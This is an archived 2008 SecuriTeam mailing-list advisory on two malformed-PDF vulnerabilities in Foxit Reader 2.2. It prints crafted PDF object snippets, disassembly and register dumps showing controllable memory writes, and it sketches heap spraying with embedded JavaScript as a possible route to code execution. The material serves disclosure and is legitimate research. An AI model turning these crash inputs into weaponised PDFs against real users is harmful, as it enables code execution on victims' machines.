Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Foxit Reader Malformed PDF Vulnerabilities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Foxit Reader Malformed PDF Vulnerabilities
Date: 22 Apr 2008 09:49:26 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Foxit Reader Malformed PDF Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://www.foxitsoftware.com/pdf/rd_intro.php> Foxit Reader is "a free 
PDF document viewer and printer, with incredible small size (only 2.1 M 
download size), breezing-fast launch speed and rich feature set. Foxit 
Reader supports Windows 98/Me/2000/XP/2003/Vista". Two security 
vulnerability in Foxit Reader allow a remote attacker armed with a 
malformed PDF file to cause the reader to crash and execute arbitrary 
code.

DETAILS

Vulnerable Systems:
 * Foxit Reader version 2.2

Malformed PDF XObject Value
The vulnerability occurs when a page with a malformed /XObject resource is 
rotated (it works if we add the /Rotate field to the page too).

4 0 obj
<< /Type /Page
/Parent 3 0 R
/Rotate 170
/Contents [ 25 0 R ]
/Resources <<
/ProcSet [ /PDF /Text /ImageB /ImageC ]
/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R  >>>>



endobj

23 0 obj
<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 
5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/ 
#4825#6#25n#00 #6e#6en#25n#72   #25n #r3/Subtype/Image>>
stream
.......................
endstream
endobj

By modifying the values of width and height fields, Foxit performs invalid 
write memory access to different memory addresses:

For example,
At EIP=51b896, width=-28986631481, height=5:

0051B88F   8B4C24 20        MOV ECX,DWORD PTR SS:[ESP+20]
0051B893   83C4 04          ADD ESP,4
0051B896   89443E 08        MOV DWORD PTR DS:[ESI+EDI+8],EAX 
(eax=0x0,esi=0x10c7fd8,edi=0x26f0020)
0051B89A   8B4424 10        MOV EAX,DWORD PTR SS:[ESP+10]
0051B89E   43               INC EBX
0051B89F   83C1 04          ADD ECX,4

At EIP=0x51b799, witdth=-87146603762, height=5:
0051B799   8937             MOV DWORD PTR DS:[EDI],ESI
0051B79B   7E 08            JLE SHORT FOXITR~1.0051B7A5
0051B79D   8977 04          MOV DWORD PTR DS:[EDI+4],ESI
0051B7A0   E9 1C010000      JMP FOXITR~1.0051B8C1
0051B7A5   DB4424 14        FILD DWORD PTR SS:[ESP+14]
..
witdth=-87146603762 EIP=51b799 write->4994e93c eax=0 ecx=c1a4027f 
edx=f5a60633 ebx=12efd0 esp=12ef18 ebp=12ef74 esi=0 edi=4994e93c
witdth=-69826555658 EIP=51b799 write->a82df00 eax=0 ecx=c181027f 
edx=fdc5c868 ebx=12efd0 esp=12ef18 ebp=12ef74 esi=0 edi=a82df00
witdth=-56992150114 EIP=51b799 write->16a509d8 eax=0 ecx=c194027f 
edx=fac27dcc ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=16a509d8
witdth=-65571130766 EIP=51b799 write->1419ad20 eax=0 ecx=c192027f 
edx=fb62d4f6 ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=1419ad20
witdth=-28986631481 EIP=51b896 write->37b8000 eax=0 ecx=10c7fd8 edx=0 
ebx=431ff6 esp=13ef18 ebp=13ef74 esi=10c7fd8 edi=26f0020
witdth=-87146603762 EIP=51b799 write->497cd994 eax=0 ecx=c1a4027f 
edx=f5ac0a15 ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=497cd994
..

Malformed PDF ExtGState Value
The vulnerability occurs when a malformed /ExtGState resource is parsed. 
In this case the ExtGState resource was supplanted with a /Font resource, 
but the type of the resource continued being ExtGState:

261 0 obj
<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408 ]/CropBox [0 0 531 
666 ]/Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> 
/Contents [20 0 R]>>
endobj

7 0 obj
<</FirstChaaa 1
/Type /Funt /FontDescriptor  23 0 R
/BaseFont /xxxxxxxxxxxxxxxxoman,Italic
/Subtype /TrueType
/Encoding /WinAnsiEncoding
/LaitChar 211
/Wodths [    ]




endobj

23 0 obj
<</zzz9 E /oooooo>>
endobj

Under these conditions it seems Foxit allocates differents structures 
waiting to complete that memory with the content of the /ExtGState 
resource. Howerver when it finds fields associated with a /Font resource, 
it tries to parse them anyway, and it completes the memory for that 
structures with incorrect data. This situation occurs because some 
functions (mainly the one located at address 0x4d1ed0) are common 
functions to parse any type of field for any type of resource. So, when 
some fields of a /Font dictionary are found under a /ExtGState resource, 
the fields are read and interpreted, and the allocated structures are 
filled with incorrect data.


This facts cause different errors in the execution. For example, this 
code:

004A6E04   C74424 04 000000>MOV DWORD PTR SS:[ESP+4],0
004A6E0C   0F84 9A000000    JE foxit_re.004A6EAC
004A6E12   8B41 08          MOV EAX,DWORD PTR DS:[ECX+8]
004A6E15   48               DEC EAX
004A6E16   83F8 08          CMP EAX,8
004A6E19   0F87 8D000000    JA foxit_re.004A6EAC
004A6E1F   FF2485 BC6E4A00  JMP DWORD PTR DS:[EAX*4+4A6EBC]

The instruction mov eax,[ecx+8].  Ecx+8 should contain a valid pointer, 
but the content of that memory is the value of the first name of the 
dictionary of the object 23 0 obj.  We can control this value so we can 
control [ecx+8], for example.

Modifying this dictionary name with different values we find crashes and 
invalid access at different EIP. For example with names with length under 
8, it uses the last bytes of the name as a pointer at EIP = 0x4A6EE7. With 
larger names it completes the structure in a different way and the 
behaviour is different.

23 0 obj
<</zzzzzzz /oooooo>>
endobj

004A6EE7   8B41 08          MOV EAX,DWORD PTR DS:[ECX+8]
004A6EEA   83E8 02          SUB EAX,2
004A6EED   74 23            JE SHORT foxit_re.004A6F12
004A6EEF   83E8 07          SUB EAX,7
004A6EF2   75 14            JNZ SHORT foxit_re.004A6F08
004A6EF4   8B41 14          MOV EAX,DWORD PTR DS:[ECX+14]
004A6EF7   8B49 10          MOV ECX,DWORD PTR DS:[ECX+10]
004A6EFA   50               PUSH EAX
004A6EFB   E8 20200000      CALL foxit_re.004A8F20

The code involved in this vulnerability is complex, lot of FPU and 
mathematical operations, etc... It is difficult to find correct values to 
exploit the vulnerability, however i think it is possible to exploit it by 
choosing some appropiated values for the input dictionaries and using heap 
spraying to facilitate the shellcode execution (heap spraying could be 
possible using javascript embedded into the own pdf file. The supplied pdf 
file uses javascript with some /Annots events so we can do heap spraying 
before the crash occured).


ADDITIONAL INFORMATION

The information has been provided by  <mailto:j.v.vallejo@gmail.com> 
Javier Vicente Vallejo.
The original article can be found at:  
<http://www.vallejo.cc/proyectos/foxitreader1.htm> 
http://www.vallejo.cc/proyectos/foxitreader1.htm and  
<http://www.vallejo.cc/proyectos/foxitreader2.htm> 
http://www.vallejo.cc/proyectos/foxitreader2.htm



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Foxit Reader Malformed PDF Vulnerabilities, SecuriTeam <=
Previous by Date:  [NT] eTrust Secure Content Manager Denial of Service, SecuriTeam
Next by Date:  [NEWS] IAX2 Incomplete 3-Way Handshake (Spoofing), SecuriTeam
Previous by Thread:  [NT] eTrust Secure Content Manager Denial of Service, SecuriTeam
Next by Thread:  [NEWS] IAX2 Incomplete 3-Way Handshake (Spoofing), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]